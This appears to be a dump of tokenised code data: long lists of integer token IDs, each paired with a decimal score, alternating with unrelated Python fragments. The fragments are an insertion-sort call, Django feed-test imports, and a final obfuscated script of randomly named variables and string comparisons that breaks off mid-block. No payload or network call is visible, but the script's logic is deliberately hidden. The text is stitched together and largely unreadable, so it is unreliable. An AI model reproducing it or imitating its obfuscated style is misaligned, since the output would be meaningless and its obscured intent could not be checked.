288,
2200,
9948,
796,
269,
907,
13,
23352,
7,
15,
13,
20,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
2200,
9948,
6719,
49283,
796,
269,
907,
13,
23352,
7,
15,
13,
20,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
48587,
9948,
796,
269,
907,
13,
23352,
7,
15,
13,
20,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
48587,
9948,
6719,
49283,
796,
269,
907,
13,
23352,
7,
15,
13,
20,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
29138,
84,
261,
796,
269,
907,
13,
23352,
7,
24214,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
29138,
84,
261,
6719,
49283,
796,
269,
907,
13,
23352,
7,
15,
13,
17,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
20031,
3447,
789,
6719,
49283,
796,
269,
907,
13,
23352,
7,
15,
13,
17,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
38779,
261,
11518,
45767,
50,
13495,
55,
796,
269,
907,
13,
23352,
7,
15,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
38779,
261,
11518,
45767,
50,
13495,
56,
796,
269,
907,
13,
23352,
7,
15,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
38779,
261,
11518,
45767,
55,
796,
269,
907,
13,
23352,
7,
20,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
38779,
261,
11518,
45767,
56,
796,
269,
907,
13,
23352,
7,
20,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
47933,
3237,
13470,
507,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
22942,
3118,
39239,
774,
51,
37668,
796,
269,
907,
13,
23352,
32590,
16,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3872,
23850,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
779,
34,
7335,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
779,
36,
9948,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
779,
32298,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
779,
39,
9948,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
779,
33239,
261,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
779,
47,
3447,
789,
796,
269,
907,
13,
30388,
7,
25101,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
10612,
198,
220,
220,
220,
8252,
261,
34,
7335,
7293,
25901,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
8252,
261,
30800,
8979,
5376,
796,
269,
907,
13,
8979,
818,
15235,
10786,
6690,
78,
33239,
261,
14,
33239,
261,
33234,
2649,
14,
7890,
14,
33239,
2389,
62,
11498,
17041,
62,
30300,
684,
62,
9319,
47,
83,
62,
18,
62,
16,
62,
27237,
13,
15763,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
350,
295,
30800,
8979,
5376,
796,
269,
907,
13,
8979,
818,
15235,
10786,
6690,
78,
33239,
261,
14,
33239,
261,
33234,
2649,
14,
7890,
14,
33239,
2389,
62,
11498,
17041,
62,
79,
507,
62,
9319,
47,
83,
62,
18,
62,
16,
62,
27237,
13,
15763,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
477,
42801,
5868,
32298,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
25979,
62,
17167,
796,
269,
907,
13,
23352,
7,
15,
13,
2999,
828,
198,
220,
220,
220,
220,
220,
220,
220,
25979,
62,
34846,
796,
269,
907,
13,
23352,
7,
15,
13,
2999,
8,
198,
220,
220,
220,
10612,
198,
220,
220,
220,
5045,
278,
37,
4665,
48944,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
9429,
4177,
320,
278,
48944,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
327,
6173,
1273,
5528,
12331,
796,
269,
907,
13,
23352,
7,
22,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
327,
6173,
1273,
5528,
7575,
34519,
796,
269,
907,
13,
23352,
7,
15,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
9429,
4177,
524,
34519,
796,
269,
907,
13,
23352,
7,
15,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
327,
6173,
29451,
12331,
796,
269,
907,
13,
23352,
7,
23,
13,
21,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
327,
6173,
29451,
7575,
34519,
796,
269,
907,
13,
23352,
7,
15,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
327,
6173,
325,
11726,
796,
269,
907,
13,
20560,
24835,
7203,
71,
2528,
34,
1416,
41030,
902,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
13225,
48944,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
327,
6173,
325,
11726,
796,
269,
907,
13,
20560,
24835,
7203,
71,
2528,
34,
1416,
41030,
902,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
360,
2898,
324,
3754,
796,
269,
907,
13,
23352,
7,
15,
13,
486,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
24311,
325,
11726,
796,
269,
907,
13,
20560,
24835,
7203,
71,
2528,
35,
83,
19,
5258,
1533,
902,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
44643,
23850,
34,
6173,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
44643,
23850,
24544,
796,
269,
907,
13,
30388,
7,
25101,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
10612,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1736,
1726,
26254,
796,
269,
907,
13,
23352,
7,
3064,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4809,
48944,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
8772,
363,
2024,
796,
269,
907,
13,
403,
2213,
6021,
13,
85,
8841,
10786,
71,
2528,
1546,
47,
22968,
7447,
2105,
12621,
844,
24331,
363,
1352,
7149,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
25812,
5097,
6962,
796,
269,
907,
13,
30388,
7,
17821,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
10612,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5765,
1273,
5528,
7575,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5765,
29451,
7575,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
14257,
796,
269,
907,
13,
30388,
7,
25101,
8,
198,
220,
220,
220,
220,
220,
220,
220,
10612,
198,
220,
220,
220,
220,
220,
220,
220,
24311,
14967,
278,
48944,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
24311,
7575,
34519,
796,
269,
907,
13,
23352,
7,
17,
13,
22,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
24311,
325,
11726,
796,
269,
907,
13,
20560,
24835,
7203,
71,
2528,
35,
83,
19,
5258,
1533,
902,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2141,
29451,
10606,
81,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
14258,
464,
8326,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
7286,
12331,
796,
269,
907,
13,
23352,
7,
21,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
28626,
9452,
796,
269,
907,
13,
600,
2624,
7,
20,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
13225,
48944,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
327,
6173,
325,
11726,
796,
269,
907,
13,
20560,
24835,
7203,
71,
2528,
34,
1416,
41030,
902,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
360,
2898,
324,
3754,
796,
269,
907,
13,
23352,
7,
15,
13,
486,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
24311,
325,
11726,
796,
269,
907,
13,
20560,
24835,
7203,
71,
2528,
35,
83,
19,
5258,
1533,
902,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
44643,
23850,
34,
6173,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
44643,
23850,
24544,
796,
269,
907,
13,
30388,
7,
25101,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
10612,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1736,
1726,
26254,
796,
269,
907,
13,
23352,
7,
49388,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
9394,
557,
10265,
16775,
507,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4809,
48944,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
8772,
363,
2024,
796,
269,
907,
13,
403,
2213,
6021,
13,
85,
8841,
10786,
71,
2528,
1546,
47,
22968,
7447,
2105,
12621,
844,
24331,
363,
1352,
7149,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
25812,
5097,
6962,
796,
269,
907,
13,
30388,
7,
17821,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
10612,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5765,
41030,
434,
51,
15,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
14257,
796,
269,
907,
13,
30388,
7,
25101,
8,
198,
220,
220,
220,
220,
220,
220,
220,
10612,
198,
220,
220,
220,
220,
220,
220,
220,
412,
9948,
28925,
26254,
796,
269,
907,
13,
23352,
7,
15,
13,
19,
828,
198,
220,
220,
220,
220,
220,
220,
220,
13047,
34,
6173,
796,
269,
907,
13,
23352,
7,
22,
13,
19,
828,
198,
220,
220,
220,
220,
220,
220,
220,
13047,
24544,
796,
269,
907,
13,
23352,
7,
21,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
13047,
30195,
796,
269,
907,
13,
23352,
7,
17,
13,
2919,
20,
828,
198,
220,
220,
220,
220,
220,
220,
220,
13047,
6500,
796,
269,
907,
13,
23352,
7,
21,
13,
3865,
828,
198,
220,
220,
220,
220,
220,
220,
220,
5765,
34,
6173,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
5765,
24544,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
5765,
2943,
1847,
796,
269,
907,
13,
30388,
7,
17821,
8,
198,
220,
220,
220,
10612,
198,
220,
220,
220,
17762,
8021,
1733,
1352,
48944,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
327,
6173,
41030,
434,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
71,
2528,
34,
1416,
41030,
902,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
2199,
78,
51,
789,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
3673,
1484,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
360,
5446,
721,
41030,
434,
19,
35,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
71,
2528,
35,
83,
19,
5258,
1533,
902,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
43374,
6690,
17889,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
3673,
1484,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
412,
1137,
721,
17889,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
3673,
1484,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
402,
39201,
1533,
434,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
71,
2528,
38,
368,
41030,
902,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
25997,
16879,
721,
17889,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
3673,
1484,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
48345,
721,
17889,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
3673,
1484,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
11948,
15,
41030,
434,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
71,
2528,
5308,
15,
41030,
902,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
1848,
1890,
15721,
752,
652,
19400,
34,
7335,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
288,
2200,
9948,
796,
269,
907,
13,
23352,
7,
24214,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
288,
2200,
9948,
6719,
49283,
796,
269,
907,
13,
23352,
7,
15,
13,
2713,
828,
198,
220,
220,
220,
220,
220,
220,
220,
288,
48587,
9948,
796,
269,
907,
13,
23352,
7,
24214,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
288,
48587,
9948,
6719,
49283,
796,
269,
907,
13,
23352,
7,
15,
13,
17,
828,
198,
220,
220,
220,
220,
220,
220,
220,
288,
29138,
84,
261,
796,
269,
907,
13,
23352,
7,
24214,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
288,
29138,
84,
261,
6719,
49283,
796,
269,
907,
13,
23352,
7,
15,
13,
17,
828,
198,
220,
220,
220,
220,
220,
220,
220,
288,
20031,
3447,
789,
6719,
49283,
796,
269,
907,
13,
23352,
7,
15,
13,
17,
828,
198,
220,
220,
220,
220,
220,
220,
220,
38779,
261,
11518,
45767,
50,
13495,
55,
796,
269,
907,
13,
23352,
7,
15,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
38779,
261,
11518,
45767,
50,
13495,
56,
796,
269,
907,
13,
23352,
7,
15,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
38779,
261,
11518,
45767,
55,
796,
269,
907,
13,
23352,
7,
20,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
38779,
261,
11518,
45767,
56,
796,
269,
907,
13,
23352,
7,
20,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
47933,
3237,
13470,
507,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
22942,
3118,
39239,
774,
51,
37668,
796,
269,
907,
13,
23352,
32590,
16,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
3872,
23850,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
779,
34,
7335,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
779,
36,
9948,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
779,
38,
3620,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
779,
32298,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
779,
39,
9948,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
779,
11682,
15,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
2,
220,
220,
220,
220,
220,
220,
220,
779,
11682,
15,
796,
269,
907,
13,
30388,
7,
17821,
828,
44386,
536,
29601,
25,
287,
262,
18043,
19644,
46,
340,
318,
3991,
986,
198,
220,
220,
220,
220,
220,
220,
220,
779,
33239,
261,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
779,
47,
3447,
789,
796,
269,
907,
13,
30388,
7,
25101,
8,
198,
220,
220,
220,
10612,
198,
220,
220,
220,
17762,
11627,
40450,
3705,
316,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
25855,
32565,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
2364,
1370,
3856,
321,
32565,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
25855,
1370,
19722,
796,
269,
907,
13,
8841,
10786,
3856,
321,
32565,
4863,
9237,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
21380,
17,
45,
67,
1659,
62,
11518,
796,
269,
907,
13,
23352,
7,
16,
68,
10,
2414,
828,
198,
220,
220,
220,
220,
220,
220,
220,
21380,
17,
2964,
65,
62,
9452,
796,
269,
907,
13,
23352,
32590,
16,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
35100,
5376,
796,
269,
907,
13,
8841,
10786,
24802,
11627,
40450,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
10560,
62,
11518,
796,
269,
907,
13,
23352,
7,
16,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
10560,
62,
53,
27206,
796,
269,
907,
13,
23352,
7,
15,
13,
486,
828,
198,
220,
220,
220,
220,
220,
220,
220,
10631,
62,
81,
796,
269,
907,
13,
23352,
7,
15,
13,
16,
828,
198,
220,
220,
220,
220,
220,
220,
220,
10631,
62,
89,
796,
269,
907,
13,
23352,
7,
15,
13,
17,
828,
198,
220,
220,
220,
220,
220,
220,
220,
24451,
896,
62,
9452,
796,
269,
907,
13,
28611,
2624,
7,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
34352,
62,
9452,
796,
269,
907,
13,
23352,
32590,
16,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
5128,
24802,
36307,
796,
269,
907,
13,
20560,
24835,
7203,
71,
2528,
35645,
17,
43,
18,
33239,
261,
13102,
2004,
4943,
198,
220,
220,
220,
10612,
198,
220,
220,
220,
26885,
42,
676,
37,
5540,
48944,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
40039,
10049,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
779,
26545,
796,
269,
907,
13,
30388,
7,
25101,
8,
198,
220,
220,
220,
10612,
198,
220,
220,
220,
751,
27726,
18380,
33239,
684,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
9277,
4873,
35694,
33239,
684,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
26038,
32657,
263,
29046,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
38279,
35,
2725,
72,
796,
269,
907,
13,
23352,
7,
15,
13,
21,
828,
198,
220,
220,
220,
220,
220,
220,
220,
38279,
35,
464,
8326,
796,
269,
907,
13,
23352,
7,
15,
13,
2999,
828,
198,
220,
220,
220,
220,
220,
220,
220,
1012,
436,
1586,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
11948,
16,
64,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
3827,
37796,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
3827,
37796,
35,
2725,
72,
796,
269,
907,
13,
23352,
7,
15,
13,
2998,
4521,
828,
198,
220,
220,
220,
220,
220,
220,
220,
3827,
37796,
35,
464,
8326,
796,
269,
907,
13,
23352,
7,
15,
13,
2999,
8,
198,
220,
220,
220,
10612,
198,
220,
220,
220,
14257,
3152,
38782,
44,
19775,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
9940,
282,
12156,
7434,
5376,
796,
269,
907,
13,
8841,
10786,
721,
282,
33809,
198,
220,
220,
220,
6070,
34,
7335,
7293,
25901,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
6070,
28925,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
6070,
22289,
24802,
35013,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
6070,
22289,
24802,
8134,
896,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
6070,
3792,
21417,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
6070,
44,
19775,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
6070,
35694,
42,
676,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
3298,
24802,
35013,
20560,
24835,
796,
269,
907,
13,
20560,
24835,
7203,
12340,
198,
220,
220,
220,
289,
9948,
12156,
7434,
5376,
796,
269,
907,
13,
8841,
10786,
71,
9948,
33809,
198,
220,
220,
220,
8169,
12156,
7434,
5376,
796,
269,
907,
13,
8841,
10786,
8873,
33809,
198,
220,
220,
220,
5128,
36307,
17822,
1424,
796,
269,
907,
13,
53,
20560,
24835,
7203,
71,
2528,
35645,
17,
43,
18,
33239,
261,
13102,
2004,
1600,
366,
71,
2528,
35645,
17,
43,
18,
9861,
65,
33239,
261,
1600,
366,
71,
2528,
43,
17,
33239,
684,
4863,
43,
16,
51,
74,
33239,
261,
25,
17354,
2953,
53,
17602,
12340,
198,
220,
220,
220,
5128,
36307,
31431,
796,
269,
907,
13,
85,
8841,
7,
198,
220,
220,
220,
220,
220,
220,
220,
705,
5083,
8339,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
705,
28751,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
705,
39605,
8339,
6,
198,
220,
220,
220,
10612,
198,
220,
220,
220,
12644,
12156,
7434,
5376,
796,
269,
907,
13,
8841,
10786,
73,
1039,
33809,
198,
220,
220,
220,
3509,
24849,
35,
87,
796,
269,
907,
13,
23352,
7,
18,
13,
15,
828,
198,
220,
220,
220,
3509,
24849,
35,
88,
796,
269,
907,
13,
23352,
7,
24214,
13,
15,
828,
198,
220,
220,
220,
3509,
24849,
36,
8326,
796,
269,
907,
13,
23352,
7,
18,
13,
15,
828,
198,
220,
220,
220,
3509,
24849,
42940,
55,
796,
269,
907,
13,
23352,
7,
19,
13,
15,
828,
198,
220,
220,
220,
3509,
24849,
42940,
56,
796,
269,
907,
13,
23352,
7,
24214,
13,
15,
828,
198,
220,
220,
220,
949,
34,
7335,
7293,
25901,
796,
269,
907,
13,
23352,
7,
15,
13,
21,
828,
198,
220,
220,
220,
949,
15057,
5189,
19044,
2052,
796,
269,
907,
13,
600,
2624,
7,
16,
828,
198,
220,
220,
220,
949,
47,
796,
269,
907,
13,
23352,
7,
15,
13,
15,
828,
198,
220,
220,
220,
949,
5662,
7335,
33239,
261,
796,
269,
907,
13,
23352,
7,
16,
10535,
830,
13,
15,
828,
198,
220,
220,
220,
949,
47,
83,
796,
269,
907,
13,
23352,
7,
17,
13,
15,
828,
198,
220,
220,
220,
42975,
817,
10126,
2514,
33762,
41572,
20540,
47,
19,
3152,
22289,
31805,
796,
269,
907,
13,
23352,
7,
2167,
13,
15,
828,
198,
220,
220,
220,
1057,
3163,
2545,
1358,
32657,
263,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
264,
13495,
817,
10126,
2514,
33762,
41572,
20540,
47,
19,
3152,
22289,
31805,
796,
269,
907,
13,
23352,
7,
17,
13,
15,
828,
198,
220,
220,
220,
2610,
12156,
7434,
5376,
796,
269,
907,
13,
8841,
10786,
2213,
10735,
33809,
198,
220,
220,
220,
3551,
40,
568,
12156,
418,
896,
796,
269,
907,
13,
30388,
7,
25101,
8,
198,
8,
198
] | 1.977833 | 6,045 |
arr = [2, 4, 1, 2, 8, 3]
insertionSort(arr)
print(arr) | [
198,
198,
3258,
796,
685,
17,
11,
604,
11,
352,
11,
362,
11,
807,
11,
513,
60,
198,
28463,
295,
42758,
7,
3258,
8,
198,
4798,
7,
3258,
8
] | 1.931034 | 29 |
from unittest.mock import patch
from django.conf import settings
from django.db import IntegrityError
from django.test import TestCase
from feeds.tests.helpers import (
make_fake_feedparser_dict, make_feed_entries_list,
make_preprocessed_entries_list
)
from feeds.models import Entry, Feed
@patch('feeds.models.preprocess_feed_entry_item')
@patch('feeds.models.fetch_feedparser_dict')
| [
6738,
555,
715,
395,
13,
76,
735,
1330,
8529,
201,
198,
201,
198,
6738,
42625,
14208,
13,
10414,
1330,
6460,
201,
198,
6738,
42625,
14208,
13,
9945,
1330,
39348,
12331,
201,
198,
6738,
42625,
14208,
13,
9288,
1330,
6208,
20448,
201,
198,
201,
198,
6738,
21318,
13,
41989,
13,
16794,
364,
1330,
357,
201,
198,
220,
220,
220,
787,
62,
30706,
62,
12363,
48610,
62,
11600,
11,
787,
62,
12363,
62,
298,
1678,
62,
4868,
11,
201,
198,
220,
220,
220,
787,
62,
3866,
14681,
276,
62,
298,
1678,
62,
4868,
201,
198,
8,
201,
198,
6738,
21318,
13,
27530,
1330,
21617,
11,
18272,
201,
198,
201,
198,
201,
198,
201,
198,
201,
198,
31,
17147,
10786,
12363,
82,
13,
27530,
13,
3866,
14681,
62,
12363,
62,
13000,
62,
9186,
11537,
201,
198,
31,
17147,
10786,
12363,
82,
13,
27530,
13,
69,
7569,
62,
12363,
48610,
62,
11600,
11537,
201,
198
] | 2.754967 | 151 |
#!/usr/bin/env python
FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF = 'RXLQksAGmIIuwhBJUptxVuytBrDBAdGQAQvkSrGtgiSFnGSZospnORAnCEZHCBz'
zmNDzvGHuIEXFHBBtGtCEpxpAQSFvzsESQMwGFYFyGQyEUBBoMCOCFPCRARREmS = 'RICsbwNkCOqPrHxHGDwjHTJCAhHPGiRZSFzrFITzFLmZFDDAuBRtAxtkQzDUuGg'
xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg = 'RlQqIOyQNICOIGoFHqDFIoZQFOjWRBBARHSuPBDyRvrvGqgYJtvxYSWSrSGIwqI'
tlsIviJwUFnrJqFHMMxASrlquyGJjQAPvTGFTkYdRunCGzBEAPoRExzFJxRJXJ = 'RqOFwYDPEAExFHFSmzQJjkJwExAoABQCZvXSSrCfLCalJEExvIAOzHERyvxzAVy'
JGVSPRGBFsIFoozrXsVmAuRCtkGmrxAJLHBNJQNXmywOzWCRIqdwHfHAVRNRhcH = 'CHImoEVySFSFEvkpOyAmuzBNCzwASPrsQCsCqnzOwSyGyHpRGNGJASuGjFGVQXn'
HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt = 'JGBDRuMQPHYBSFQzFDEGITFTjtPFPFuEXhsHJQGRQwvQPSwxoqXECqQqVPICHwk'
if FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF != tlsIviJwUFnrJqFHMMxASrlquyGJjQAPvTGFTkYdRunCGzBEAPoRExzFJxRJXJ:
zmNDzvGHuIEXFHBBtGtCEpxpAQSFvzsESQMwGFYFyGQyEUBBoMCOCFPCRARREmS = xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg
for HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt in tlsIviJwUFnrJqFHMMxASrlquyGJjQAPvTGFTkYdRunCGzBEAPoRExzFJxRJXJ:
if HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt != xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg:
